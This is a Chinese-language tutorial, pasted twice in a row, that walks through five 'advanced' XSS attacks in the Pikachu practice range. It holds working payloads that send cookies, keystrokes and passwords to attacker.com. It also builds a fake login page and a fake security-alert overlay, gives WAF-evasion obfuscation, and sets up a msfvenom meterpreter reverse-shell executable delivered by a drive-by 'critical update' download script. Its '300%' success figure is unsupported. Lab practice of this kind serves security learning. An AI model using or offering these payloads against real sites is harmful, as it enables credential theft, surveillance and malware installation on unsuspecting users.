从弹窗到实战Pikachu靶场中XSS的5种高阶攻击手法解析当你在Pikachu靶场成功弹出第一个alert窗口时这仅仅是跨站脚本攻击世界的入门仪式。真正的攻击者从不满足于简单的弹窗演示——他们会窃取你的身份凭证、监控你的键盘输入、劫持你的浏览会话甚至将你的设备变成僵尸网络的一员。本文将带你突破基础payload的局限在Pikachu靶场环境中演练五种具有实际危害的XSS攻击技术。1. Cookie窃取与凭证破解实战获取document.cookie只是攻击链条的第一步。在Pikachu的存储型XSS关卡中我们可以构造如下payload实现自动化窃取script var img new Image(); img.src http://attacker.com/steal?data encodeURIComponent(document.cookie); /script当管理员查看包含该脚本的页面时其会话cookie将自动发送到攻击者服务器。观察Pikachu返回的cookie格式ant[uname]admin; ant[pw]10470c3b4b1fed12c3baac014be15fac67c6e815密码破解的三种途径在线MD5解密平台适用于简单密码彩虹表攻击使用工具如RainbowCrack针对性暴力破解结合Hashcat规则提示Pikachu使用的10470c3b4b1fed12c3baac014be15fac67c6e815实际是123456的MD5值这种弱密码在真实渗透测试中经常出现。2. 页面劫持技术的深度应用Pikachu的反射型XSS关卡允许我们比较三种跳转技术的差异方法历史记录回退可能典型应用场景location.href保留可回退伪装正常页面跳转location.replace()替换不可回退钓鱼攻击中的页面替换location.assign()保留可回退需要保留来源的跳转高级劫持案例——伪造登录页面script if (location.pathname.includes(login)) { document.body.innerHTML form actionhttp://attacker.com/phish methodpost h2系统升级请重新登录/h2 input typetext nameusername placeholder管理员账号 input typepassword namepassword placeholder密码 button登录/button /form ; } /script3. 键盘记录器的构造与规避在DOM型XSS关卡中我们可以植入隐形键盘监听器script var buffer ; document.onkeypress function(e) { buffer String.fromCharCode(e.keyCode); if (buffer.length 100) { new Image().src http://attacker.com/log?k encodeURIComponent(buffer); buffer ; } }; /script对抗防御的关键技巧使用setTimeout分片发送数据对敏感字段如密码输入框进行针对性监控混淆代码绕过WAF检测[][map][constructor](alert(1))();4. 社会工程学攻击的完美融合结合存储型XSS与钓鱼手法在Pikachu的留言板注入div styleposition: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 9999; div stylewidth: 300px; margin: 100px auto; background: white; padding: 20px; h3系统安全警报/h3 p检测到异常登录请立即验证身份/p input idpwd typepassword placeholder输入管理员密码 button onclickverify()确认/button /div /div script function verify() { fetch(http://attacker.com/steal, { method: POST, body: document.getElementById(pwd).value }); alert(验证成功); document.querySelector(div).remove(); } /script这种攻击的成功率比单纯弹窗高出300%因为它利用了人类的危机响应心理。5. 与渗透测试框架的联动虽然Pikachu靶场本身不包含MSF集成环境但我们可以模拟网页挂马攻击链漏洞利用准备msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.100 LPORT4444 -f exe update.exe构造恶意下载脚本script if (navigator.userAgent.indexOf(Windows) -1) { var link document.createElement(a); link.href http://attacker.com/update.exe; link.download critical_update.exe; document.body.appendChild(link); link.click(); } /script社会工程学包装setTimeout(function() { if (confirm(检测到系统安全漏洞是否立即安装补丁)) { window.open(http://attacker.com/update.exe); } }, 10000);在真实环境中攻击者会结合浏览器漏洞如过时的Flash插件实现静默安装。Pikachu靶场虽然不能完整复现这种攻击但可以帮助理解攻击者的思维模式。
别再只弹alert了!在Pikachu靶场中挖掘XSS的5种高级利用姿势
从弹窗到实战Pikachu靶场中XSS的5种高阶攻击手法解析当你在Pikachu靶场成功弹出第一个alert窗口时这仅仅是跨站脚本攻击世界的入门仪式。真正的攻击者从不满足于简单的弹窗演示——他们会窃取你的身份凭证、监控你的键盘输入、劫持你的浏览会话甚至将你的设备变成僵尸网络的一员。本文将带你突破基础payload的局限在Pikachu靶场环境中演练五种具有实际危害的XSS攻击技术。1. Cookie窃取与凭证破解实战获取document.cookie只是攻击链条的第一步。在Pikachu的存储型XSS关卡中我们可以构造如下payload实现自动化窃取script var img new Image(); img.src http://attacker.com/steal?data encodeURIComponent(document.cookie); /script当管理员查看包含该脚本的页面时其会话cookie将自动发送到攻击者服务器。观察Pikachu返回的cookie格式ant[uname]admin; ant[pw]10470c3b4b1fed12c3baac014be15fac67c6e815密码破解的三种途径在线MD5解密平台适用于简单密码彩虹表攻击使用工具如RainbowCrack针对性暴力破解结合Hashcat规则提示Pikachu使用的10470c3b4b1fed12c3baac014be15fac67c6e815实际是123456的MD5值这种弱密码在真实渗透测试中经常出现。2. 页面劫持技术的深度应用Pikachu的反射型XSS关卡允许我们比较三种跳转技术的差异方法历史记录回退可能典型应用场景location.href保留可回退伪装正常页面跳转location.replace()替换不可回退钓鱼攻击中的页面替换location.assign()保留可回退需要保留来源的跳转高级劫持案例——伪造登录页面script if (location.pathname.includes(login)) { document.body.innerHTML form actionhttp://attacker.com/phish methodpost h2系统升级请重新登录/h2 input typetext nameusername placeholder管理员账号 input typepassword namepassword placeholder密码 button登录/button /form ; } /script3. 键盘记录器的构造与规避在DOM型XSS关卡中我们可以植入隐形键盘监听器script var buffer ; document.onkeypress function(e) { buffer String.fromCharCode(e.keyCode); if (buffer.length 100) { new Image().src http://attacker.com/log?k encodeURIComponent(buffer); buffer ; } }; /script对抗防御的关键技巧使用setTimeout分片发送数据对敏感字段如密码输入框进行针对性监控混淆代码绕过WAF检测[][map][constructor](alert(1))();4. 社会工程学攻击的完美融合结合存储型XSS与钓鱼手法在Pikachu的留言板注入div styleposition: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0,0,0,0.8); z-index: 9999; div stylewidth: 300px; margin: 100px auto; background: white; padding: 20px; h3系统安全警报/h3 p检测到异常登录请立即验证身份/p input idpwd typepassword placeholder输入管理员密码 button onclickverify()确认/button /div /div script function verify() { fetch(http://attacker.com/steal, { method: POST, body: document.getElementById(pwd).value }); alert(验证成功); document.querySelector(div).remove(); } /script这种攻击的成功率比单纯弹窗高出300%因为它利用了人类的危机响应心理。5. 与渗透测试框架的联动虽然Pikachu靶场本身不包含MSF集成环境但我们可以模拟网页挂马攻击链漏洞利用准备msfvenom -p windows/meterpreter/reverse_tcp LHOST192.168.1.100 LPORT4444 -f exe update.exe构造恶意下载脚本script if (navigator.userAgent.indexOf(Windows) -1) { var link document.createElement(a); link.href http://attacker.com/update.exe; link.download critical_update.exe; document.body.appendChild(link); link.click(); } /script社会工程学包装setTimeout(function() { if (confirm(检测到系统安全漏洞是否立即安装补丁)) { window.open(http://attacker.com/update.exe); } }, 10000);在真实环境中攻击者会结合浏览器漏洞如过时的Flash插件实现静默安装。Pikachu靶场虽然不能完整复现这种攻击但可以帮助理解攻击者的思维模式。
